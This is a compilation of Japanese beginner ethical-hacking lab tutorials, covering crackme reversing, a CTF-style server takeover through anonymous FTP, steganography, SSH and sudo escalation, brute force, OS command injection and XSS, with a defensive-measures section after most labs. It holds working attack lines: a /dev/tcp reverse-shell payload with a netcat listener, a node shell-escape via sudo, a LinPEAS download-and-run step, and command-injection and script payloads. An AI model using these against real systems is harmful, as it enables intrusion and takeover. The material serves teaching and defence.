解析

まずこのファイルが何なのか「file」コマンドで確認します。

┌──(kali㉿kali)-[~/Downloads]
└─$ file crackme
crackme: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=75738b208b83feabd92439f81104e978710f4d19, for GNU/Linux 3.2.0, not stripped

ELFのexecutableということで、Linux上で実行できるファイルであることが分かります。
では実行してみましょう。（マルウェアの可能性もあるので、いきなり実行するのは本来危ないです。）

┌──(kali㉿kali)-[~/Downloads]
└─$ ./crackme 
Enter the password: 123456
Not Accepted

実行するとパスワードを求められ、適当なパスワードを入力すると「Not Accepted」というメッセージが出力されます。
つまり正しいパスワードを入力することが今回のゴールです。
ですが私達はパスワードを知りません。そこで正しいパスワードをリバースエンジニアリングによって取得します。

次に実行ファイルから文字列を取得してみましょう。

┌──(kali㉿kali)-[~/Downloads]
└─$ strings crackme 
/lib64/ld-linux-x86-64.so.2
puts
__libc_start_main
__cxa_finalize
printf
__isoc99_scanf
strcmp
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
TalkToMeH
Enter the password: 
Well Done
Not Accepted
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o

出力結果が長いので一部省略していますが、「Enter the password: 」や「Not Accepted」などの見慣れた文字列も見られます。
その2つの間にある「Well Done」は正解時のメッセージであると予想することができます。
「Enter the password: 」の上には、「TalkToMeH」という謎の文字列がありますが、今は何かわからないので頭の片隅に入れて、次のステップに進みましょう。

シンボル情報（関数名や変数名などの情報）を確認してみましょう。
「nm」コマンドを実行することで、オブジェクトファイルのシンボル情報を確認できます。

                                                                                                                                   
┌──(kali㉿kali)-[~/Downloads]
└─$ nm crackme
000000000000037c r __abi_tag
0000000000004030 B __bss_start
0000000000004030 b completed.0
                 w __cxa_finalize@GLIBC_2.2.5
0000000000004020 D __data_start
0000000000004020 W data_start
00000000000010b0 t deregister_tm_clones
0000000000001120 t __do_global_dtors_aux
0000000000003dd8 d __do_global_dtors_aux_fini_array_entry
0000000000004028 D __dso_handle
0000000000003de0 d _DYNAMIC
0000000000004030 D _edata
0000000000004038 B _end
00000000000011f0 T _fini
0000000000001160 t frame_dummy
0000000000003dd0 d __frame_dummy_init_array_entry
0000000000002108 r __FRAME_END__
0000000000003fe8 d _GLOBAL_OFFSET_TABLE_
                 w __gmon_start__
0000000000002034 r __GNU_EH_FRAME_HDR
0000000000001000 T _init
0000000000002000 R _IO_stdin_used
                 U __isoc99_scanf@GLIBC_2.7
                 w _ITM_deregisterTMCloneTable
                 w _ITM_registerTMCloneTable
                 U __libc_start_main@GLIBC_2.34
0000000000001169 T main
                 U printf@GLIBC_2.2.5
                 U puts@GLIBC_2.2.5
00000000000010e0 t register_tm_clones
0000000000001080 T _start
                 U strcmp@GLIBC_2.2.5
0000000000004030 D __TMC_END__

下の方に「strcmp」という関数があります。
この関数は2つの文字列を比較をするものです。つまりこの関数で、パスワードのチェックをしているのではないかと予想できます。

ではこの関数の処理を見てみましょう。
今回は「ltrace」を使用します。
「ltrace」とは、ダイナミックリンクライブラリの呼び出しを追跡するプログラムで、今回であれば「strcmp」関数の引数を確認するために使用します。

┌──(kali㉿kali)-[~/Downloads]
└─$ ltrace ./crackme
printf("Enter the password: ")                                                              = 20
__isoc99_scanf(0x55e930f3f019, 0x7ffe9a991930, 0, 0Enter the password: 

ltraceを実行すると、一度ここで止まります。
「scanf」で止まっており、パスワードを聞かれています。適当なパスワードを入力しましょう。
すると正しいパスワードが判明します。

┌──(kali㉿kali)-[~/Downloads]
└─$ ltrace ./crackme
printf("Enter the password: ")                                                              = 20
__isoc99_scanf(0x55e930f3f019, 0x7ffe9a991930, 0, 0Enter the password: hello
)                                        = 1
strcmp("hello", "TalkToMe")                                                                 = 20
puts("Not Accepted"Not Accepted
)                                                                        = 13
+++ exited (status 0) +++

strcmp関数で「hello」と「TalkToMe」が比較されています。
「hello」は僕が入力したものなので、「TalkToMe」がパスワードではないかと見当がつきます。

では正しいパスワードでプログラムを動かしてみましょう。

┌──(kali㉿kali)-[~/Downloads]
└─$ ./crackme  
Enter the password: TalkToMe
Well Done

正解しました。
このようにリバースエンジニアリングを行うことで、内部の処理を把握することができ、今回であれば普通は取得できないパスワードを当てることができました。

今回は超入門でしたが、通常のリバースエンジニアリングでは「Ghidra」や「IDA」などのデコンパイル（逆アセンブリ）ツールを使うことがほとんどです。
Ghidraに少しだけ触れてみましょう。

Ghidra

まずGhidraをインストールして実行します。

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo apt update && sudo apt install ghidra --fix-missing

┌──(kali㉿kali)-[~/Downloads]
└─$ ghidra

Ghidraが起動すると、「File」→「Import File」を選択し、Crackmeをインポートします。
すると、「Auto Analyze」のポップアップが出るので、全てOKを押しましょう。
すると下記の画像のような状態になるはずです。

そして左側の「Symbol Tree」内の「Functions」からmainを選択します。

デコンパイル結果を見ると、ソースコードのようなものが確認できます。

デコンパイル結果のコードはとてもシンプルで、入力したパスワードが合っていれば「Well Done」、間違っていれば「Not Accepted」というメッセージが出力されます。
どうやら正しいパスワードは「local81」という変数に入っているのですが、「0x654d6f546b6c6154」という16進数として格納されています。
その16進数にカーソルを当てると、char型で「eMoTklaT」と表示されます。
勘のいい方は、これが正解のパスワードである「TalkToMe」を逆から読んだ形であると気づくかもしれません。
これはリトルエンディアンであるためです。気になる方は調べてみてください。

要はGhidraを使えば、コンパイルされたプログラムをデコンパイルして、デコンパイルされたコードを追っていくことで、プログラムの処理を理解することができます。
実際は全ての処理を追っていくのは大変ですが、Ghidraによるリバースエンジニアリングの様子だけでも理解してもらえると嬉しいです。

Writeup

まずはポートスキャンを実行しましょう。
ポートスキャンとは、コンピュータネットワークのセキュリティを評価またはテストするための手法の１つであり、特定のホスト上のネットワークポートの状態を調査するプロセスです。これにより、ネットワーク上のシステムがどのようなサービスを提供しているのか、およびそれらのサービスがどのポートで利用可能であるかを判断することができます。

と言われても分かりにくいでしょう。ChatGPTに簡単に説明するように依頼したので、これでイメージがつくはずです。

コンピュータはお互いに話すために特別な「ドア」を使います。これらの「ドア」はポートと呼ばれています。たくさんの異なるポートがあり、それぞれが異なる種類の情報を送受信します。
ポートスキャンは、コンピュータがどの「ドア」（ポート）を開いていて、どの「ドア」を閉じているのかを見つける方法です。これは、コンピュータが他のコンピュータとどのように話しているのかを理解するのに役立ちます。

例えば、あるコンピュータがたくさんの「ドア」を開いていると、他の人が入ってきて何か悪いことをする可能性があります。だから、コンピュータのオーナーは、どの「ドア」が開いていてどの「ドア」が閉じているのかを知る必要があります。そして、悪い人が入ってこないように、「ドア」をきちんと閉じることができます。
ポートスキャンは、コンピュータの「ドア」をチェックする方法で、コンピュータを安全に保つのに役立ちます。でも、悪い人もこの方法を使って、コンピュータに入ろうとすることがあります。だから、ポートスキャンは注意して使う必要があります。

ポートスキャンはツールにより簡単に実行できます。
有名な「nmap」と呼ばれるツールがありますので、「nmap」を実行してみましょう。

nmap -sV -sC -Pn 10.0.2.26

結果は下記になります。

Nmap scan report for 10.0.2.26
Host is up (0.00047s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.0.2.24
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Sep 04 14:21 pub
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 99e3ec65f0a66efbaeb97e70df35d1e3 (ECDSA)
|_  256 6a5ebecc61bc6636cefb1bad9ba99cc9 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

3つのポートが開いていることがわかります。
まずは、皆さんに一番なじみ深いPort80から見てみましょう。

Port80

Port80とは普段見ているWebサイトで使用されるポートです。（厳密には、HTTPSのサイトではPort443も使用されていますが、いったん置いておきましょう。）
ですので、ブラウザにIPアドレスを打ち込むことでアクセスできます。
実は「http」から始まるURLは、そのWebサーバーのPort80にアクセスしていることになります。
ですので、下記2つは同じになります。

http://10.0.2.26
http://10.0.2.26:80

いちいち「:80」をブラウザ上でつけることはあまりありませんが、つけてもブラウザからアクセスできます。
ブラウザからアクセスすると、「Apache2」のデフォルトページが出てきます。

どうやらこのページには何もなさそうです。
ではWebアプリケーションの脆弱性の際に学んだ、ディレクトリブルートフォースを実行してみましょう。
「dirsearch」を実行します。

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.0.2.26/ 

すると、「/secret」と呼ばれるディレクトリがあることが判明しました。
移動してみると、下記画像の様にユーザーネームとパスワードを求められます。

これはBasic認証と呼ばれ、クレデンシャルを知っている人しか閲覧できないように制限をかけるものです。
僕たちはクレデンシャルを持っていないので、ここから先に進むことができません。
一度別のポートを見る必要がありそうです。

Port21

Port21はFTPが稼働していることが多いです。FTPはFile Transfer Protocolの略称で、コンピューター間でファイルを転送する際に使用するプロトコルです。
基本的にFTPではクレデンシャルが必要なことが多いですが、ポートスキャンの結果を見ると、匿名ユーザーでログインできることがわかります。
では匿名ユーザーでFTPにログインしてみましょう。

┌──(kali㉿kali)-[~]
└─$ ftp 10.0.2.26
Connected to 10.0.2.26.
220 (vsFTPd 3.0.5)
Name (10.0.2.26:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.

ユーザーネームは「anonymous」でパスワードはなんでも大丈夫です。
そして中身を見てみると、「basic_credential.txt」といういかにもなファイルが見つかります。

ftp> ls
229 Entering Extended Passive Mode (|||60631|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Sep 04 14:21 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||11626|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            38 Sep 01 15:48 basic_credential.txt
226 Directory send OK.
ftp> get basic_credential.txt
local: basic_credential.txt remote: basic_credential.txt
229 Entering Extended Passive Mode (|||46045|)
150 Opening BINARY mode data connection for basic_credential.txt (38 bytes).
100% |*********************************************************************************************************|    38      174.22 KiB/s    00:00 ETA
226 Transfer complete.
38 bytes received in 00:00 (56.14 KiB/s)

お目当てのファイルをダウンロードできたので、FTPから「exit」コマンドでログアウトします。
次に中身を「cat」コマンドで確認してみましょう。

┌──(kali㉿kali)-[~]
└─$ cat basic_credential.txt 
username: 456-aaa
password: Secret123

Basic認証のクレデンシャルが判明しました。
ではもう一度Port80に戻って、「/secret」ディレクトリに移動しましょう。
そして、ユーザーネームとパスワードを入力すると、アクセスできることが分かります。

メッセージを読んでみると、どうやらここにSSHのパスワードがあるようです。（SSHは後ほど説明します。）
しかし、テキストベースでパスワードは書かれていないようです。となると、ウサギの画像がどうも怪しく思えます。
ダウンロードして、解析してみましょう。

ステガノグラフィー

まずは、画像のメタデータをのぞいてみましょう。
メタデータとは、ユーザーには表示されていないその画像の詳細データです。
下記コマンドにて確認できます。結果と合わせて見てみてください。

┌──(kali㉿kali)-[~/Downloads]
└─$ exiftool rabbit.jpg 
ExifTool Version Number         : 12.57
File Name                       : rabbit.jpg
Directory                       : .
File Size                       : 87 kB
File Modification Date/Time     : 2023:09:28 04:48:06-04:00
File Access Date/Time           : 2023:09:28 04:48:06-04:00
File Inode Change Date/Time     : 2023:09:28 04:48:06-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 1024
Image Height                    : 1024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1024x1024
Megapixels                      : 1.0

特に重要な情報はなさそうです。
では次にステガノグラフィーを疑ってみましょう。
ステガノグラフィーについてはWikipediaを参照してください。
ja.wikipedia.org
「steghide」というコマンドでステガノグラフィーの確認をできます。
ステガノグラフィーによって秘匿されたメッセージやファイルを抽出するためには、パスワードを入力する必要がありますが、今回はパスワードを設定し忘れていることを願ってパスワードを空白にしてみましょう。

┌──(kali㉿kali)-[~/Downloads]
└─$ steghide extract -sf rabbit.jpg
Enter passphrase: 
wrote extracted data to "ssh_credential.txt".

どうやら、「ssh_credential.txt」というファイルが隠されていたようです。
開いてみると、SSHのクレデンシャルが格納されていることが分かりました。

SSH credential info
username: sam
password: S3cur3_Th3_C0d3!

これでSSHからログインできそうです。

Port22

Port22では通常SSHが稼働しています。SSHとは、Secure Shellの略称で、リモートコンピュータと通信するためのプロトコルです。
つまり、サーバーのユーザーネームとパスワードを所持していれば、サーバーにログインできるということです。
試しに先ほどのクレデンシャルで試してみましょう。

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh sam@10.0.2.26              
The authenticity of host '10.0.2.26 (10.0.2.26)' can't be established.
ED25519 key fingerprint is SHA256:Lm0l2aOYhhk8gpcfaUHur3HqltZOlDNnLtqj7Bnoz1Y.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.26' (ED25519) to the list of known hosts.
sam@10.0.2.26's password: 
$ whoami
sam
$ id
uid=1001(sam) gid=1001(sam) groups=1001(sam)

するとターゲットのサーバーにログインできたことが分かります。
「whoami」や「id」などのコマンドを叩いてみても、Kali Linuxと別環境であることがわかるはずです。
これでサーバーへの侵入が完了しました。おめでとうございます。

しかしここで終わりではありません。
権限昇格という仕事が皆さんには残っています。
確かに「sam」というユーザーとしてログインできましたが、最高権限を持っているわけではありません。
Linuxでは通常「root」というユーザーが最高権限であり、rootユーザーを目指しましょう。
rootになることで、サーバーを完全に掌握したと言えます。

権限昇格

Linuxの権限昇格には、「LinPEAS」というツールがお勧めです。
ではターゲットのサーバーに「LinPEAS」をダウンロードして、実行権限を与えましょう。

$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230924-10138da9/linpeas.sh
$ chmod +x linpeas.sh

そして実行します。

$ ./linpeas.sh

すると、カラフルな結果が返ってくるはずです。その中でオレンジ背景の赤文字が見当たるはずです。

これは、権限を昇格する際に高確率で活用できる情報です。
上記画像には、「janet」というユーザーの権限で「node」コマンドを実行できるという情報があります。
「janet」ユーザーが今より権限が高い可能性がありますので、移動してみましょう。
下記記事にて、sudoで「node」を実行できる際に、実行される権限のユーザーになることのできる（シェルを取ることができる）コマンドが書いてあります。
gtfobins.github.io

ではsudoコマンドを利用して、「janet」として「node」を実行してみましょう。

$ sudo -u janet node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
$ id
uid=1000(janet) gid=1000(janet) groups=1000(janet),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),136(sambashare)

実行すると、「janet」ユーザーになっていることが分かります。
「id」コマンドの結果から、「janet」は「sam」より権限が高いのではないかと予想できます。
「sudo」でどのコマンドを実行できるのか確認してみると、root権限で全てのコマンドを実行できることが分かります。
ですので、「sudo bash」にてrootユーザーに権限を昇格させましょう。

$ sudo -l
Matching Defaults entries for janet on janet-VirtualBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, pwfeedback

User janet may run the following commands on janet-VirtualBox:
    (ALL) NOPASSWD: ALL
    (root) NOPASSWD: /usr/bin/mintdrivers-remove-live-media
    (root) NOPASSWD: /usr/bin/mint-refresh-cache
    (root) NOPASSWD: /usr/lib/linuxmint/mintUpdate/synaptic-workaround.py
    (root) NOPASSWD: /usr/lib/linuxmint/mintUpdate/dpkg_lock_check.sh
$ sudo bash
root@janet-VirtualBox:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

おめでとうございます。これであなたはrootです。
ターゲットのサーバーを完全に掌握しました。

いかがだったでしょうか。これがペネトレーションテストになります。
サーバーへの侵入の快感を少しでも知ってもらえると嬉しいです。
今回のサーバーは、実際の業務として行うものよりは、CTFと呼ばれるセキュリティコンテストの問題に近いと思います。

対策

先ほどもお伝えしたように、現実世界では今回と同様のサーバーはまずないでしょう。
しかしこのサーバーから様々なことを学ぶことができます。

まずFTPでは、匿名ユーザーでのログインを許可すべきではないことです。
ユーザーネームとパスワードを設定し、攻撃者に侵入されないようにしましょう。
そしてSSHでは、秘密鍵でのログインを強制するべきです。
今回のサーバーではSSHに、ユーザーネームとパスワードだけでログインすることが可能です。
本来これは推奨されておらず、秘密鍵を用いたログイン方法が一般的です。
公開鍵認証を使えば、秘密鍵を所持しているユーザーしかログインできないため、ブルートフォース攻撃などに対して脆弱でなくなります。
またサーバー内では、「sam」→「janet」→「root」への権限の昇格が簡単でした。
侵入されたことを想定して、他ユーザーへ権限を昇格されてしまうおそれのある脆弱性は必ず潰しておく必要があります。

お疲れ様でした。
続いては、もう少し現実味のあるサーバーをハッキングしましょう。

learn-ethicalhacking.hatenablog.com

ブルートフォース攻撃 - ログイン

ではブルートフォース攻撃を体験してみましょう。
SQLインジェクションの時に見た様なログインプログラムがあります。一度適当なユーザーネームとパスワードを入力してみましょう。

先ほどはSQLインジェクションで突破しましたが、今回はブルートフォース攻撃にて突破します。
ユーザーネームとパスワード両方をブルートフォースしてもよいですが、組み合わせの数があまりに多すぎるため、おすすめできません。
実はユーザーネームは皆さんがすでに知っている方法で取得できます。
探してみましょう。

見つかりましたか？

ページソースを見てると、ユーザーネームがadminであることが判明しました。
では、パスワードだけをブルートフォースしましょう。

ブルートフォース（辞書型攻撃）を実行するには2つのものが必要です。
1つ目はワードリストです。ワードリストは様々なものがGithubに落ちているため、すぐにダウンロードして使用することが可能です。
2つ目はブルートフォースを実行するプログラムです。Pythonなどのプログラミング言語でスクリプトを作成することも可能ですが、今回はBurp SuiteのIntruder機能を使いましょう。
Burp SuiteのIntruderを利用することで、ブルートフォースを実行することが可能です。

では先ほど適当なユーザーネームとパスワードでログインしたリクエストを「HTTP history」タブより発見し、右クリックして、「Send to Intruder」を選択しましょう。

Intruderタブに移動すると上記画像のような画面にいるはずです。
まずユーザーネームがadminでない人は、adminに変更してください。
そしてパスワードをブルートフォースする用意をしましょう。
github.com
このワードリストをダウンロードしてください。このリストには500個の激弱パスワードが格納されています。

ではBurp Suiteの設定をします。
先ほどの画面で入力したパスワードをカーソルで選択し、右上の「Add$」ボタンを押します。
するとパスワード部分が青色っぽくなったはずです。

その状態で一個右の「Payloads」タブへ移動します。
そして「Payload settings」より「Load」ボタンを押して、先ほどのワードリストを選択します。（Downloadsフォルダにあるはずです。）
最後に右上の「Start attack」ボタンを押すとブルートフォース攻撃が開始されます。

ではどのようにパスワードが当たっていることを判定するかについてお伝えします。
Intruderの結果には、送信したペイロードとStatus code、Lengthなどがあります。
ここで注目したいのがLengthです。
パスワードが当たっていない場合と当たっている場合では、レスポンスに何かしらの違いがあると考えるのが当然です。
つまりはLengthも異なる可能性が高いでしょう。
そこでLengthの文字部分をクリックすると、一番上にLengthの異なるパスワードが表示されるはずです。（一番上に来ない場合はもう一度Lengthを押してみてください。）
そしてResponseを見てみると、ログインに成功していることがわかります。

「secret」がパスワードであることが分かりました。
では正しいユーザーネームとパスワードでログインしてみましょう。するとログインに成功するはずです。
ブルートフォース攻撃はシンプルですが強力な攻撃手法のため、適切な対策を取る必要があります。

ブルートフォース攻撃 - ディレクトリ

では次にディレクトリのブルースフォース攻撃です。
実はブルートフォース攻撃はパスワードを特定する以外にも、ディレクトリやサブドメインの発見にも役立ちます。
ちなみにURLは今いるページでは下記の様になっています。

http://10.0.2.23:3000/bruteforce-directory

上記URLでは「bruteforce-directory」部分がディレクトリにあたります。先ほどのログインプログラムでは「bruteforce-login」となっていました。
基本的にはユーザーがWebサイトのリンクやボタンなどをクリックすることで画面が遷移しますが、実際に起こっていることは違うディレクトリへと遷移しているイメージです。

ではここで疑問が浮かびます。
実際にクリックして遷移できるディレクトリ以外のディレクトリが存在するのかということです。
実際問題隠れたディレクトリが存在する場合は非常に多く、そこから情報漏えいが発生することも少なくありません。

では実際にディレクトリのブルートフォースをしてみましょう。
ディレクトリブルートフォースには様々なツールやワードリストが存在しますが、今回は「dirsearch」を使用します。
「dirsearch」はディレクトリブルートフォースのためのツールです。
標準ではKali Linuxにインストールされていないので、インストールしましょう。
下記コマンドでインストールできます。パスワードを求められた際は「kali」と入力してください。

sudo apt update && sudo apt install dirsearch

ではdirsearchでブルートフォースしましょう。

dirsearch -u http://10.0.2.23:3000/  # IPアドレスは皆さんの環境に合わせてください。

すると下記画像の様に「/admin」というディレクトリが存在することが判明しました。

では「/admin」ディレクトリに行ってみましょう。

すると、「You found me」というメッセージが見つかりました。
今回のようにディレクトリをブルートフォースするだけで機密情報が漏えいできることも少なくありません。
開発者はWebサイト上から一般ユーザーがアクセスできないディレクトリ（ページ）をよく残してしまうのです。

対策

ログインのブルートフォース攻撃への対策はシンプルです。
まずはユーザーに複雑なパスワードを設定させることです。ブルートフォース攻撃は総当たりをしているだけなので、複雑なパスワードであるだけで一気に成功率が低下します。
パスワードを使い回させないことも大切です。なぜなら他のサービスでパスワードが漏えいしていて、そのパスワードがどこかのワードリストに入っている可能性があるからです。
またログインの試行回数を制限することも大切です。例えば5回パスワードを間違えるとアカウントをロックするといったことが考えられます。
皆さんもパスワードを忘れてアカウントがロックされた経験があるかもしれません。

そして2段階認証を設定することも大切です。
仮にユーザーネームとパスワードの組み合わせを当てられたとしても、（フィッシング攻撃以外で）2段階認証を突破することは不可能に近いです。
ですので、ユーザーとしては2段階認証を行うこと、開発者は2段階認証をユーザーに強いることが必要です。

ディレクトリのブルートフォース攻撃への対策は、Basic認証を設定したり、IPアドレスによる制限を行うことで、重要な情報を含んだディレクトリへのアクセスを制限することが大切です。

お疲れ様でした。
次はIDOR（安全でない直接オブジェクトの参照）です。

learn-ethicalhacking.hatenablog.com

OSコマンドインジェクション(Level1)

「Pingプログラム」という画面が表示されたはずです。
名前から想像がつく方もいるかもしれませんが、入力したIPアドレスにPingを送信するものです。
Pingを知らない人は下記リンクを参考にしてください。
www.cman.jp
では一度ローカルループバックアドレスである「127.0.0.1」を入力してみましょう。
ちなみにここに入力したIPアドレスにはPingリクエストが実際に送信されるので、適当なIPアドレスはできるだけ入力しないようにお願いします。仮に入力してしまっても、攻撃をしているわけではありませんのでご安心ください。

ブラウザ上ではアウトプットが綺麗に見えないので、Burp Suiteで確認しましょう。

レスポンスからコマンドのアウトプットが確認できます。
アウトプットからLinuxのPingコマンドを使用しているのではないかと予想してみましょう。

例えば下記の様なコマンドを実行していると予想できます。

ping -c 4 127.0.0.1  # 127.0.0.1はユーザーが入力する部分

であれば、先ほどお伝えしたコマンドセパレータで任意のコマンドを入力できます。
では「date」コマンドを実行してみましょう。

ping -c 4 127.0.0.1; date

入力する値としては、下記になります。

127.0.0.1;date

ちなみに「127.0.0.1」の部分は省略しても構いません。というのもコマンドセパレータ「;」は前のコマンドが成功したかどうかにかかわらず、コマンドセパレータ後のコマンドを実行するからです。
下記画像ではIPアドレスを省略しています。
Burp SuiteのRepeater機能を使ってペイロードを送信すると、dateコマンドを実行することができます。

これで任意のコマンドを実行することができました。
今回はdateコマンドを使用したので被害があるようには思えませんが、OSコマンドインジェクションが存在すると、かなりの確率でサーバーへ侵入されてしまいます。
詳細はペネトレーションテストの際にお伝えしますが、一度デモンストレーションを行ってみましょう。
今回、サーバーに侵入するため（リバースシェル）のペイロードは下記になります。

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1  # 10.0.0.1は攻撃用のKali LinuxのIPアドレスです。4444はポート番号です。

上記のペイロードを入力する前に、Kali Linuxでポートを開きましょう。今回は4444番を開きます。

nc -lvnp 4444

ポートを開いたら、先ほどのペイロードを送信しましょう。

;bash -i >& /dev/tcp/10.0.2.24/4444 0>&1

すると先ほど開いたポートにリバースシェルが到達していることが確認できます。

リバースシェルを取得したということはサーバーへ侵入ができたという事なので、ターゲットのサーバー上でどんなコマンドでも実行することができます。
実際に完全にサーバーを掌握するためには権限昇格をする必要がありますが、基本的に侵入できるとあらゆることが可能になると考えてください。

OSコマンドインジェクションなどのサーバーサイドの脆弱性は、サーバーの侵入に繋がるおそれがあることを理解してください。

OSコマンドインジェクション(Level2)

続いても「Pingプログラム」です。
まずは先ほどと同じペイロードを送信しましょう。

;date

すると下記の様なエラーが発生するはずです。

どうやら先ほどと同じペイロードでは上手くいかないようです。
ではどのように回避できるでしょうか？エラーを基に考えてみてください。

では正解に移ります。
エラーをよく見てみると、pingだけでなくdateコマンドに対してもエラーが発生しています。
エラー文を読むと、dateコマンドに存在しない「-c」というオプションが使用されていることが問題なようです。
このことからLevel2でのpingコマンドの全容を想像することが可能です。Level1と比較してみましょう。

# level1
ping -c 4 127.0.0.1
# level2
ping 127.0.0.1 -c 4

つまり、「-c」オプションとIPアドレスの順番が違うことによるエラーということです。
Level1ではIPアドレス（ユーザーの入力値）の後にコマンドがないので成功していましたが、Level2ではIPアドレスの後にコマンドがまだ続くため、先ほどのペイロードでは失敗してしまいました。
ではどうすればいいのでしょうか？
様々な選択肢がありますが、IPアドレス以降をコメントアウトする方法を使ってみましょう。
ペイロードはこちらになります。

;date #

「#」以降はコメントアウトされるため、「-c」オプションを無視することができます。
では実際に試してみましょう。

すると、dateコマンドが正しく実行されていることが分かります。

今回はコマンドのエラー文がレスポンスとして返ってきましたが、実際の環境ではエラー文が見えないことがほとんどです。
ですので、あえて時間経過を必要とするコマンド（pingなど）や外部への通信を行うコマンド（curlなど）をきっかけに、OSコマンドインジェクションを発見することが多いです。
OSコマンドインジェクションは、デモンストレーションでサーバーに侵入したように非常に危険な脆弱性のため、強固な対策が必要です。

対策

対策は大きく分けて3つ考えられます。
1つ目はインプットのバリデーションです。
今回の例であれば、ユーザーのインプットはIPアドレスに制限されます。ですので、ユーザーのインプットがIPアドレスになっているかどうかを、正規表現などでバリデーションすることが可能です。

2つ目は標準関数をできるだけ使用することです。
本記事の冒頭でお伝えしたファイルを開くという操作をする際は、一般的に標準関数を使用するとお伝えしました。
各プログラミング言語には様々なライブラリが存在するので、OSのコマンドを実行する場面を最小限にすることが大切です。

3つ目は安全にOSのコマンドを実行できる関数を使用することです。
例えばJavaScriptでは下記の様にOSのコマンドを実行できます。

const { exec } = require('child_process');
exec(`ping -c 4 ${address}`, (err, stdout, stderr) => {
  if (err) {
     // execute something
  }
 // execute something
}

exec関数は実際に「Pingプログラム」で使用された関数です。
JavaScriptでは、exec関数でなく、execFile関数を用いることでより安全にOSのコマンドを実行できます。
execFile関数はデフォルトではシェルを起動せず、実行可能ファイルを直接実行するので、他のコマンドを実行することが不可能になります。

const { execFile } = require('child_process');
execFile('ping', ['-c', '4', address], (err, stdout, stderr) => {
  if (err) {
     // execute something
  }
 // execute something
}

以上の3つの対策を組み合わせることで安全にOSのコマンドを実行することが可能です。

お疲れ様でした。
続いてはディレクトリトラバーサルです。

learn-ethicalhacking.hatenablog.com

XSS(クロスサイトスクリプティング) - Level1

トップページより「XSS(クロスサイトスクリプティング) - Level1」をクリックしてください。
すると「2乗計算プログラム」という画面が表示されたはずです。

攻撃する前に通常の動作を確認しましょう。

例えば3という数字を入れてみます。すると2乗された数字9が表示されます。

他の数字で試してみても、全て2乗されて出力されることが分かります。
気づいたかもしれませんが、2乗された数字だけでなく入力した数字も同時に画面に出力されています。
サイバーセキュリティに関わる人間は必ずここでXSSがある可能性を疑います。

次に一度「hello」という文字列を入力してみましょう。

もちろん文字列「hello」を2乗することは数学的に不可能ですから、2乗された数字ではエラーっぽいものが確認できます。（NaNはNot a Numberの略です。）
しかしながら、入力した数字として「hello」が出力されています。
つまり数字でなくても画面上に入力した文字列を出力できることが分かりました。

では一度下記の文字列を入れてみましょう。

<h1>hello</h1>

すると「hello」が大きな文字で表示されたことが分かります。

これはいったいどういうことでしょうか？
先ほど入力した文字列は「HTML」と呼ばれるものです。

HTMLは「HyperText Markup Language」の略で、Webページを作成するためのマークアップ言語の1つです。HTMLはWebページの構造を定義し、テキスト・画像・リンク・フォームなどの要素を配置するためのタグを提供します。
HTMLについては下記記事が参考になります。
udemy.benesse.co.jp

どんなWebサイトであってもページソースを見ることができます。
実際に「2乗計算プログラム」画面の適当な黒い背景部分を右クリックして「View page source」を選択してください。
すると下記画像の様に、このWebサイトを構成するHTMLのソースコードが見えるはずです。

ちなみにGoogleやAmazonなどの大きなWebサイトであっても、同様の手法でHTMLのソースコードを確認できます。（可読性は低いことが多いです。）

上記の画像をよく見てみると、先ほど入力したHTMLのコードが注入されていることが分かります。
ちなみに<h1>は見出しを作成する際に使用するHTMLタグで、大きい文字を出力したい時に使用します。
これでHTMLのコードを注入できることが分かりました。

それではXSSの神髄に迫りましょう。
HTMLタグの中に<script>というものがあります。これはスクリプトタグと呼ばれ、JavaScriptというプログラミング言語をスクリプトタグ内に記述できます。
JavaScriptはブラウザ上で実行されるため、任意のコードが実行できてしまうとクライアントサイドの脆弱性となってしまうのです。

例えば下記の様なコードを入力してみましょう。

<script>alert(1)</script>

すると、アラートが表示されるはずです。

